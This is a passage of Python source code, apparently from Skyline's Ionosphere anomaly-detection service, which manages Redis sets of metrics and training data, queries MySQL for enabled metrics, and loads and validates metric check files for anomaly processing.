logger.info('added %s historical training data instances' % (str(historical_training_data_added)))
if training_data_instances:
training_data_count = len(training_data_instances)
redis_set = 'ionosphere.training_data.new'
logger.info('creating Redis set %s with %s training_data instances' % (redis_set, str(training_data_count)))
try:
# Delete it if it exists and was not renamed for some reason
self.redis_conn.delete(redis_set)
logger.info(
'deleted Redis set - %s' % (redis_set))
except:
pass
# @modified 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Added resolution_seconds
# for metric, timestamp in training_data_instances:
for metric, timestamp, resolution_seconds in training_data_instances:
try:
# @modified 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Added resolution_seconds
# data = [metric, int(timestamp)]
data = [metric, int(timestamp), resolution_seconds]
self.redis_conn.sadd(redis_set, str(data))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to %s Redis set' % (str(data), redis_set))
try:
# Rename works to overwrite existing key fine
# and ... https://redis.io/commands/rename
# > when this happens RENAME executes an implicit DEL operation, so if the
# > deleted key contains a very big value it may cause high latency even if RENAME
# > itself is usually a constant-time operation.
# Does not apply here as it is not a massive set
self.redis_conn.rename('ionosphere.training_data.new', 'ionosphere.training_data')
logger.info('replaced Redis ionosphere.training_data via a rename of ionosphere.training_data.new')
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to rename ionosphere.training_data.new to ionosphere.training_data')
last_purge_ts = int(time())
try:
self.redis_conn.setex(last_purge_key, 1800, last_purge_ts)
logger.info('updated Redis key for %s' % last_purge_key)
except:
logger.error('error :: failed to update Redis key for %s' % last_purge_key)
backup_purge_ts_file = '%s/last_purge_ts.txt' % (settings.IONOSPHERE_DATA_FOLDER)
try:
write_data_to_file(skyline_app, backup_purge_ts_file, 'w', last_purge_ts)
logger.info('updated the backup_purge_ts_file with %s' % str(last_purge_ts))
except:
logger.error('error :: failed to update the backup_purge_ts_file - %s' % backup_purge_ts_file)
return
def remove_metric_check_file(self, metric_check_file):
if os.path.isfile(str(metric_check_file)):
try:
os.remove(str(metric_check_file))
logger.info('metric_check_file removed - %s' % str(metric_check_file))
except OSError:
pass
return
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# Branch #922: Ionosphere
# Bringing Ionosphere online - do alert on Ionosphere metrics
def manage_ionosphere_unique_metrics(self):
"""
- Create a Redis set of all Ionosphere enabled metrics.
- Manage the ionosphere.untrainable_metrics set, removing items when
they 'expire'
:param i: python process id
:return: returns True
"""
def get_an_engine():
try:
engine, log_msg, trace = get_engine(skyline_app)
return engine, log_msg, trace
except:
trace = traceback.format_exc()
logger.error('%s' % trace)
log_msg = 'error :: failed to get MySQL engine for manage_ionosphere_unique_metrics'
logger.error('%s' % log_msg)
return None, log_msg, trace
ionosphere_unique_metrics_count = 0
redis_ionosphere_unique_metrics = None
ionosphere_unique_metrics = []
try:
# ionosphere_unique_metrics = list(self.redis_conn.smembers('ionosphere.unique_metrics'))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# redis_ionosphere_unique_metrics = self.redis_conn.smembers('ionosphere.unique_metrics')
redis_ionosphere_unique_metrics = self.redis_conn_decoded.smembers('ionosphere.unique_metrics')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere.unique_metrics from Redis')
# ionosphere_unique_metrics = []
if redis_ionosphere_unique_metrics is not None:
ionosphere_unique_metrics = list(redis_ionosphere_unique_metrics)
ionosphere_unique_metrics_count = len(ionosphere_unique_metrics)
logger.info('Redis ionosphere.unique_metrics set has %s metrics' % (str(ionosphere_unique_metrics_count)))
else:
logger.info('Redis ionosphere.unique_metrics unknown, setting to []')
ionosphere_unique_metrics = []
manage_ionosphere_unique_metrics = True
manage_ionosphere_unique_metrics_key = []
try:
manage_ionosphere_unique_metrics_key = self.redis_conn.get('ionosphere.manage_ionosphere_unique_metrics')
except Exception as e:
if LOCAL_DEBUG:
logger.error('error :: could not query Redis for ionosphere.manage_ionosphere_unique_metrics key: %s' % str(e))
if manage_ionosphere_unique_metrics_key is not None:
manage_ionosphere_unique_metrics = False
logger.info('getting MySQL engine for ionosphere_enabled_metrics')
try:
engine, log_msg, trace = get_an_engine()
logger.info(log_msg)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine for ionosphere_enabled_metrics')
return False
if not engine:
logger.error('error :: MySQL engine not obtained for ionosphere_enabled_metrics')
return False
# Determine the metrics that have ionosphere_enabled
# @added 20170103 - Task #1658: Patterning Skyline Ionosphere
# TODO: We need 2 sets not just ionosphere.unique_metrics otherwise
# if a metric is switched from Analyzer to Mirage it will send all
# matched anomalies to Ionosphere even if there is no features
# profile at the specified duration.
# ionosphere.analyzer.unique_metrics (at FULL_DURATION)
# ionosphere.mirage.unique_metrics (NOT at FULL_DURATION)
# @modified 20170108 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Yes those ^^ are needed, MySQL join?
ionosphere_enabled_metrics = []
ionosphere_metrics_count = 0
query_ok = False
try:
stmt = 'select metric from metrics where ionosphere_enabled=1'
connection = engine.connect()
for row in engine.execute(stmt):
metric_basename = row['metric']
metric_name = '%s%s' % (str(settings.FULL_NAMESPACE), str(metric_basename))
ionosphere_enabled_metrics.append(metric_name)
connection.close()
query_ok = True
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine ionosphere_enabled metrics from the DB to manage ionosphere.unique_metrics Redis set')
ionosphere_metrics_count = len(ionosphere_enabled_metrics)
logger.info('db has %s ionosphere_enabled metrics' % (str(ionosphere_metrics_count)))
# @added 20190528 - Branch #3002: docker
if ionosphere_metrics_count == 0:
ionosphere_enabled_metrics = ['none']
if manage_ionosphere_unique_metrics:
# Only update if the query was fine as Ionosphere metrics can go to 0
# if all were disabled
if query_ok:
manage_ionosphere_unique_metrics = True
else:
manage_ionosphere_unique_metrics = False
if manage_ionosphere_unique_metrics:
for metric_name in ionosphere_enabled_metrics:
try:
self.redis_conn.sadd('ionosphere.new_unique_metrics', metric_name)
# logger.info('added %s to ionosphere.new_unique_metrics Redis set' % metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to ionosphere.new_unique_metrics Redis set' % metric_name)
try:
self.redis_conn.setex('ionosphere.manage_ionosphere_unique_metrics', 300, time())
except:
logger.error('error :: failed to set key :: ionosphere.manage_ionosphere_unique_metrics')
try:
logger.info('replacing Redis ionosphere.unique_metrics via rename of ionosphere.new_unique_metrics')
self.redis_conn.rename('ionosphere.new_unique_metrics', 'ionosphere.unique_metrics')
manage_ionosphere_unique_metrics = False
ionosphere_unique_metrics = []
except Exception as e:
if str(e) == 'no such key':
logger.info('could not rename Redis set ionosphere.new_unique_metrics to ionosphere.unique_metrics: %s' % str(e))
else:
logger.error('error :: could not rename Redis set ionosphere.new_unique_metrics to ionosphere.unique_metrics: %s' % str(e))
try:
self.redis_conn.setex('ionosphere.manage_ionosphere_unique_metrics', 300, time())
except:
logger.error('error :: failed to set key :: ionosphere.manage_ionosphere_unique_metrics')
redis_ionosphere_unique_metrics = []
try:
# ionosphere_unique_metrics = list(self.redis_conn.smembers('ionosphere.unique_metrics'))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# redis_ionosphere_unique_metrics = self.redis_conn.smembers('ionosphere.unique_metrics')
redis_ionosphere_unique_metrics = self.redis_conn_decoded.smembers('ionosphere.unique_metrics')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere.unique_metrics from Redis')
# ionosphere_unique_metrics = []
if redis_ionosphere_unique_metrics is not None:
ionosphere_unique_metrics = list(redis_ionosphere_unique_metrics)
ionosphere_unique_metrics_count = len(ionosphere_unique_metrics)
logger.info('the new Redis ionosphere.unique_metrics set has %s metrics' % (str(ionosphere_unique_metrics_count)))
else:
logger.info('Redis ionosphere.unique_metrics unknown, setting to []')
ionosphere_unique_metrics = []
if engine:
try:
engine.dispose()
except:
logger.error(traceback.format_exc())
logger.error('error :: calling engine.dispose()')
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Manage ionosphere_untrainable_metrics Redis set
ionosphere_untrainable_metrics = []
ionosphere_untrainable_metrics_redis_set = 'ionosphere.untrainable_metrics'
try:
ionosphere_untrainable_metrics = list(self.redis_conn_decoded.smembers(ionosphere_untrainable_metrics_redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get the ionosphere.untrainable_metrics set from Redis')
if ionosphere_untrainable_metrics:
ionosphere_untrainable_metrics_check_time = int(time())
for ionosphere_untrainable_metric_str in ionosphere_untrainable_metrics:
try:
ionosphere_untrainable_metric = literal_eval(ionosphere_untrainable_metric_str)
ium_remove_after_timestamp = int(ionosphere_untrainable_metric[6])
if ionosphere_untrainable_metrics_check_time >= ium_remove_after_timestamp:
try:
self.redis_conn.srem(ionosphere_untrainable_metrics_redis_set, str(ionosphere_untrainable_metric))
logger.info('removed item - %s - from Redis set - %s' % (str(ionosphere_untrainable_metric), ionosphere_untrainable_metrics_redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove item from Redis set - %s' % ionosphere_untrainable_metrics_redis_set)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to manage Redis set %s' % ionosphere_untrainable_metrics_redis_set)
return True
# @added 20161230 - Feature #1830: Ionosphere alerts
# Bug #1460: panorama check file fails
# Panorama check file fails #24
# Get rid of the skyline_functions imp as imp is deprecated in py3 anyway
def new_load_metric_vars(self, metric_vars_file):
"""
Load the metric variables for a check from a metric check variables file
:param metric_vars_file: the path and filename to the metric variables files
:type metric_vars_file: str
:return: the metric_vars list or ``False``
:rtype: list
"""
if os.path.isfile(metric_vars_file):
logger.info(
'loading metric variables from metric_check_file - %s' % (
str(metric_vars_file)))
else:
logger.error(
'error :: loading metric variables from metric_check_file - file not found - %s' % (
str(metric_vars_file)))
return False
metric_vars = []
with open(metric_vars_file) as f:
for line in f:
no_new_line = line.replace('\n', '')
no_equal_line = no_new_line.replace(' = ', ',')
array = str(no_equal_line.split(',', 1))
add_line = literal_eval(array)
metric_vars.append(add_line)
string_keys = ['metric', 'anomaly_dir', 'added_by', 'app', 'source']
float_keys = ['value']
# @modified 20170127 - Feature #1886: Ionosphere learn - child like parent with evolutionary maturity
# Added ionosphere_parent_id, always zero from Analyzer and Mirage
int_keys = [
'from_timestamp', 'metric_timestamp', 'added_at', 'full_duration',
'ionosphere_parent_id']
# @added 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
array_keys = ['triggered_algorithms', 'algorithms', 'algorithms_run']
boolean_keys = ['graphite_metric', 'run_crucible_tests']
metric_vars_array = []
for var_array in metric_vars:
key = None
value = None
if var_array[0] in string_keys:
key = var_array[0]
value_str = str(var_array[1]).replace("'", '')
value = str(value_str)
if var_array[0] == 'metric':
metric = value
if var_array[0] in float_keys:
key = var_array[0]
value_str = str(var_array[1]).replace("'", '')
value = float(value_str)
if var_array[0] in int_keys:
key = var_array[0]
value_str = str(var_array[1]).replace("'", '')
value = int(value_str)
if var_array[0] in array_keys:
key = var_array[0]
value = literal_eval(str(var_array[1]))
if var_array[0] in boolean_keys:
key = var_array[0]
if str(var_array[1]) == 'True':
value = True
else:
value = False
if key:
metric_vars_array.append([key, value])
if len(metric_vars_array) == 0:
logger.error(
'error :: loading metric variables - none found in %s' % (
str(metric_vars_file)))
return False
logger.info('debug :: metric_vars for %s' % str(metric))
logger.info('debug :: %s' % str(metric_vars_array))
return metric_vars_array
# @added 20170109 - Feature #1854: Ionosphere learn
# Added the spawn_learn_process after determining that it is not fit to bolt learn
# inside of ionosphere.py in its entirety, no point in more conditional nesting
# and bulking up ionosphere.py with more learn parameters to spin_process etc.
# ionosphere.py works, as good as it gets, so it was extended with learn.py. This uses
# the same no memory leak pattern that was adopted for smtp_alerts.
def spawn_learn_process(self, i, timestamp):
"""
Spawn a process to learn.
This is used for Ionosphere to learn if anomalous metrics remain
anomalous over time, as the resolution decreases. It follows the
multiprocessing methodology that was introduced in Analyzer and Mirage
in the context of the process objects being cleared down. The learn
processes cannot create memory leaks as the process always terminates or
is terminated, which prevents any memory leaks in the parent.
"""
# @modified 20170117 - Feature #1854: Ionosphere learn - generations
# Renamed the function from simple learn to the meme it has become
# learn(timestamp)
ionosphere_learn(timestamp)
# @added 20190326 - Feature #2484: FULL_DURATION feature profiles
def process_ionosphere_echo(self, i, metric_check_file):
"""
Spawn a process_ionosphere_echo check to create features profiles at
settings.FULL_DURATION for Mirage metrics
:param i: python process id
:param metric_check_file: full path to the metric check file
:type i: object
:type metric_check_file: str
:return: boolean
:rtype: boolean
"""
try:
# Load and validate metric variables
metric_vars_array = self.new_load_metric_vars(str(metric_check_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: process_ionosphere_echo :: failed to load metric variables from check file - %s' % (metric_check_file))
return
added_by = None
try:
key = 'added_by'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
added_by = str(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - added_by - %s' % added_by)
except:
logger.error('error :: process_ionosphere_echo failed to read added_by variable from check file - %s' % (metric_check_file))
added_by = None
if not added_by:
return
if added_by != 'mirage':
# @modified 20200109 - Feature #3380: Create echo features profile when a Mirage features profile is created
# Allow to be added by webapp
if added_by == 'webapp':
logger.info('process_ionosphere_echo :: metric added_by %s OK' % added_by)
else:
logger.info('process_ionosphere_echo :: only mirage metrics are processed not metrics added_by %s' % added_by)
return
metric = None
try:
# metric_vars.metric
key = 'metric'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
metric = str(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - metric - %s' % metric)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to read metric variable from check file - %s' % (metric_check_file))
metric = None
if not metric:
logger.error('error :: process_ionosphere_echo failed to load metric variable from check file - %s' % (metric_check_file))
return
# @added 20190413 - Feature #2484: FULL_DURATION feature profiles
# Only process if it is an ionosphere enabled metric
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_unique_metrics = list(self.redis_conn.smembers('ionosphere.unique_metrics'))
ionosphere_unique_metrics = list(self.redis_conn_decoded.smembers('ionosphere.unique_metrics'))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere.unique_metrics from Redis')
ionosphere_unique_metrics = []
if ionosphere_unique_metrics:
# @modified 20190413 - Bug #2942: process_ionosphere_echo metric mismatch
# Feature #2484: FULL_DURATION feature profiles
# Matching bug - for 'not in' against the list it must be an absolute
# match on the full namespaced metric name
# if not metric in ionosphere_unique_metrics:
metric_name = '%s%s' % (str(settings.FULL_NAMESPACE), str(metric))
# @modified 20190522: Task #3034: Reduce multiprocessing Manager list usage
# if not metric_name in ionosphere_unique_metrics:
if metric_name not in ionosphere_unique_metrics:
# @modified 20200109 - Feature #3380: Create echo features profile when a Mirage features profile is created
# Allow metrics added by webapp to skip this check as they may
# be new ionosphere metrics and not be in the ionosphere.unique_metrics
# set yet
if added_by == 'webapp':
logger.info('process_ionosphere_echo :: %s is not in ionosphere.unique_metrics but added by webapp so possibly a new metric' % metric)
else:
logger.info('process_ionosphere_echo :: only ionosphere enabled metrics are processed, skipping %s' % metric)
return
full_duration = None
try:
# metric_vars.full_duration
key = 'full_duration'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
full_duration = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - full_duration - %s' % str(full_duration))
except:
logger.error('error :: process_ionosphere_echo failed to read full_duration variable from check file - %s' % (metric_check_file))
full_duration = None
if not full_duration:
return
logger.info('process_ionosphere_echo :: processing - %s' % (metric))
ionosphere_echo(metric, full_duration)
# @modified 20190404 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Added the ionosphere_busy parameter
# def spin_process(self, i, metric_check_file):
def spin_process(self, i, metric_check_file, ionosphere_busy):
"""
Assign an anomalous metric to check against features profiles.
:param i: python process id
:param metric_check_file: full path to the metric check file
:param ionosphere_busy: whether Ionosphere is busy and should alternate
between normal Ionosphere and echo analysis
:type i: object
:type metric_check_file: str
:type ionosphere_busy: boolean
:return: int
:rtype: int or boolean
"""
def get_an_engine():
try:
engine, log_msg, trace = get_engine(skyline_app)
return engine, log_msg, trace
except:
trace = traceback.format_exc()
logger.error(trace)
log_msg = 'error :: failed to get MySQL engine in spin_process'
logger.error(log_msg)
return None, log_msg, trace
def engine_disposal(engine):
if engine:
try:
engine.dispose()
except:
logger.error(traceback.format_exc())
logger.error('error :: calling engine.dispose()')
return
# @added 20200904 - Feature #3734: waterfall alerts
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp]
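# For illustration (hypothetical metric and values): with added_by 'mirage'
# the set is 'mirage.waterfall_alerts.sent_to_ionosphere' and an item looks
# like "['stats.web01.cpu.user', 1607186400, 1.0, 1607186460]"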
def remove_waterfall_alert(added_by, metric_timestamp, base_name):
redis_waterfall_alert_set = '%s.waterfall_alerts.sent_to_ionosphere' % added_by
literal_waterfall_alerts = []
try:
literal_waterfall_alerts = list(self.redis_conn_decoded.smembers(redis_waterfall_alert_set))
except:
literal_waterfall_alerts = []
waterfall_alerts = []
for literal_waterfall_alert in literal_waterfall_alerts:
waterfall_alert = literal_eval(literal_waterfall_alert)
waterfall_alerts.append(waterfall_alert)
for waterfall_alert in waterfall_alerts:
if waterfall_alert[0] == base_name:
if int(waterfall_alert[1]) == int(metric_timestamp):
try:
self.redis_conn.srem(redis_waterfall_alert_set, str(waterfall_alert))
logger.info('removed waterfall alert item from Redis set %s - %s' % (
redis_waterfall_alert_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove waterfall alert item for %s at %s from Redis set %s' % (
base_name, str(metric_timestamp), redis_waterfall_alert_set))
# @added 20201128 - Feature #3734: waterfall alerts
# If the check just done is newer than an existing mirage
# waterfall alert metric timestamp remove those keys as well
if int(waterfall_alert[1]) < metric_timestamp:
try:
self.redis_conn.srem(redis_waterfall_alert_set, str(waterfall_alert))
logger.info('removed waterfall alert item with older timestamp from Redis set %s - %s' % (
redis_waterfall_alert_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove waterfall alert item for %s at %s from Redis set %s' % (
base_name, str(metric_timestamp), redis_waterfall_alert_set))
return
# @added 20200908 - Feature #3734: waterfall alerts
# Added a common return_to_sender_to_alert function
# @added 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
def return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run):
cache_key = 'ionosphere.%s.alert.%s.%s' % (added_by, metric_timestamp, base_name)
cache_key_value = [float(anomalous_value), base_name, int(metric_timestamp), triggered_algorithms, full_duration, algorithms_run]
try:
self.redis_conn.setex(cache_key, 300, str(cache_key_value))
logger.info('added Redis alert key - %s - %s' % (
cache_key, str(cache_key_value)))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to add Redis key - %s - [%s, \'%s\', %s, %s, %s, %s]' %
(cache_key, str(anomalous_value), base_name, str(int(metric_timestamp)),
str(triggered_algorithms), str(full_duration), str(algorithms_run)))
return
child_process_pid = os.getpid()
logger.info('child_process_pid - %s' % str(child_process_pid))
try:
ionosphere_max_runtime = settings.IONOSPHERE_MAX_RUNTIME
except:
ionosphere_max_runtime = 120
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: processing metric check - %s' % metric_check_file)
if not os.path.isfile(str(metric_check_file)):
logger.error('error :: file not found - metric_check_file - %s' % (str(metric_check_file)))
return
engine = None
anomalous_timeseries = False
check_file_name = os.path.basename(str(metric_check_file))
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_name - %s' % check_file_name)
check_file_timestamp = check_file_name.split('.', 1)[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_timestamp - %s' % str(check_file_timestamp))
check_file_metricname_txt = check_file_name.split('.', 1)[1]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_txt - %s' % check_file_metricname_txt)
check_file_metricname = check_file_metricname_txt.replace('.txt', '')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname - %s' % check_file_metricname)
check_file_metricname_dir = check_file_metricname.replace('.', '/')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_dir - %s' % check_file_metricname_dir)
metric_failed_check_dir = '%s/%s/%s' % (failed_checks_dir, check_file_metricname_dir, check_file_timestamp)
failed_check_file = '%s/%s' % (metric_failed_check_dir, check_file_name)
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: failed_check_file - %s' % failed_check_file)
# @added 20200807 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# From batch_processing metrics the learn check is being added and
# removed as the learn check for batch metrics happens immediately as
# the learn after duration can have passed. So the check file needs to
# be loaded to determine if it was added by ionosphere_learn before the
# check is just removed.
removed_check_file_work_done = False
# @added 20170307 - Feature #1960: ionosphere_layers - ionosphere_check_cache_key
# This Redis cache key check was added to prevent Ionosphere from
# running riot on checks if for some reason the check_file is not
# removed, which happens if some exception is not handled, as found out
# again during yesterday's development of run_layer_algorithms. It was
# a good reminder of how fast Skyline can iterate.
ionosphere_check_cache_key = 'ionosphere.check.%s' % check_file_name
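# e.g. (illustrative, hypothetical metric): a check file named
# '1607186400.stats.web01.cpu.user.txt' results in the Redis key
# 'ionosphere.check.1607186400.stats.web01.cpu.user.txt'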
check_done = False
try:
check_done = self.redis_conn.get(ionosphere_check_cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
if not check_done:
logger.info('check done - no check cache key - %s' % ionosphere_check_cache_key)
else:
# @modified 20181113 - Task #2680: Remove Ionosphere check files is key exists
# This was here for initially debugging, no longer needed
# logger.error('error :: a check cache key exists - %s' % ionosphere_check_cache_key)
# logger.error('error :: failing check to prevent multiple iterations over this check')
# fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
logger.info('a check cache key exists - %s' % (ionosphere_check_cache_key))
# @modified 20200807 - Feature #3480: batch_processing
# logger.info('to prevent multiple iterations over this check removing %s' % (
logger.info('to prevent multiple iterations over this check it will be removed if not added by ionosphere_learn - %s' % (
str(metric_check_file)))
# self.remove_metric_check_file(str(metric_check_file))
# return
# @added 20200807 - Feature #3480: batch_processing
removed_check_file_work_done = True
try:
check_process_start = int(time())
# @modified 20190412 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# redis-py 3.x only accepts user data as bytes, strings or
# numbers (ints, longs and floats). All 2.X users should
# make sure that the keys and values they pass into redis-py
# are either bytes, strings or numbers. Added cache_key_value
# self.redis_conn.setex(
# ionosphere_check_cache_key, 300, [check_process_start])
self.redis_conn.setex(
ionosphere_check_cache_key, 300, check_process_start)
logger.info(
'added Redis check key - %s' % (ionosphere_check_cache_key))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to add Redis check key - %s' % (ionosphere_check_cache_key))
logger.error('error :: failing check to prevent multiple iterations over this check')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
try:
# Load and validate metric variables
# @modified 20161231 - Feature #1830: Ionosphere alerts
# Bug #1460: panorama check file fails
# Panorama check file fails #24
# Get rid of the skyline_functions imp as imp is deprecated in py3 anyway
# Use def new_load_metric_vars(self, metric_vars_file):
# metric_vars = load_metric_vars(skyline_app, str(metric_check_file))
metric_vars_array = self.new_load_metric_vars(str(metric_check_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to load metric variables from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# Test metric variables
# We use a pythonic methodology to test if the variables are defined;
# this ensures that if any of the variables are not set for some reason
# we can handle unexpected data or situations gracefully and try to
# ensure that the process does not hang.
metric = None
try:
# metric_vars.metric
# metric = str(metric_vars.metric)
key = 'metric'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
metric = str(value_list[0])
base_name = metric
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - metric - %s' % metric)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to read metric variable from check file - %s' % (metric_check_file))
metric = None
if not metric:
logger.error('error :: failed to load metric variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
value = None
try:
# metric_vars.value
# value = str(metric_vars.value)
key = 'value'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
value = float(value_list[0])
anomalous_value = value
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - value - %s' % str(value))
except:
logger.error('error :: failed to read value variable from check file - %s' % (metric_check_file))
value = None
if not value:
# @modified 20181119 - Bug #2708: Failing to load metric vars
if value == 0.0:
pass
else:
logger.error('error :: failed to load value variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
from_timestamp = None
try:
# metric_vars.from_timestamp
# from_timestamp = str(metric_vars.from_timestamp)
key = 'from_timestamp'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
from_timestamp = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - from_timestamp - %s' % str(from_timestamp))
except:
# @added 20160822 - Bug #1460: panorama check file fails
# Added exception handling here
logger.info(traceback.format_exc())
logger.error('error :: failed to read from_timestamp variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
if not from_timestamp:
logger.error('error :: failed to load from_timestamp variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
metric_timestamp = None
try:
# metric_vars.metric_timestamp
# metric_timestamp = str(metric_vars.metric_timestamp)
key = 'metric_timestamp'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
metric_timestamp = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - metric_timestamp - %s' % str(metric_timestamp))
except:
logger.error('error :: failed to read metric_timestamp variable from check file - %s' % (metric_check_file))
metric_timestamp = None
if not metric_timestamp:
logger.error('error :: failed to load metric_timestamp variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
try:
# metric_vars.algorithms
# algorithms = metric_vars.algorithms
key = 'algorithms'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
algorithms = value_list[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - algorithms - %s' % str(algorithms))
except:
logger.error('error :: failed to read algorithms variable from check file, setting to all - %s' % (metric_check_file))
algorithms = 'all'
try:
# metric_vars.triggered_algorithms
# triggered_algorithms = metric_vars.triggered_algorithms
key = 'triggered_algorithms'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
triggered_algorithms = value_list[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - triggered_algorithms - %s' % str(triggered_algorithms))
except:
logger.error('error :: failed to read triggered_algorithms variable from check file, setting to all - %s' % (metric_check_file))
triggered_algorithms = 'all'
added_by = None
try:
# metric_vars.added_by
# added_by = str(metric_vars.added_by)
key = 'added_by'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
added_by = str(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - added_by - %s' % added_by)
except:
logger.error('error :: failed to read added_by variable from check file - %s' % (metric_check_file))
added_by = None
if not added_by:
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# @added 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
try:
key = 'algorithms_run'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
algorithms_run = value_list[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - algorithms_run - %s' % str(algorithms_run))
except:
logger.error('error :: failed to read algorithms_run variable from check file, setting to defaults - %s' % (metric_check_file))
if added_by == 'mirage':
algorithms_run = settings.MIRAGE_ALGORITHMS
else:
algorithms_run = settings.ALGORITHMS
# @added 20170117 - Feature #1854: Ionosphere learn - generations
if str(added_by) == 'ionosphere_learn':
logger.info('debug :: metric variable - added_by - %s' % added_by)
# @added 20200807 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
if removed_check_file_work_done:
logger.info('this check was added by ionosphere_learn so not removing check even though a check done Redis key exists')
removed_check_file_work_done = False
# @added 20200807 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
if removed_check_file_work_done:
logger.info('a check cache key exists and the check was not added by ionosphere_learn - %s' % (ionosphere_check_cache_key))
logger.info('to prevent multiple iterations over this check removing %s' % (
str(metric_check_file)))
# @added 20200908 - Feature #3734: waterfall alerts
# Remove waterfall alert item
if added_by != 'ionosphere_learn':
remove_waterfall_alert(added_by, metric_timestamp, base_name)
self.remove_metric_check_file(str(metric_check_file))
return
# @added 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# If added_by is analyzer_batch, log and change to analyzer so that
# Ionosphere routes any alerts back to analyzer
if str(added_by) == 'analyzer_batch':
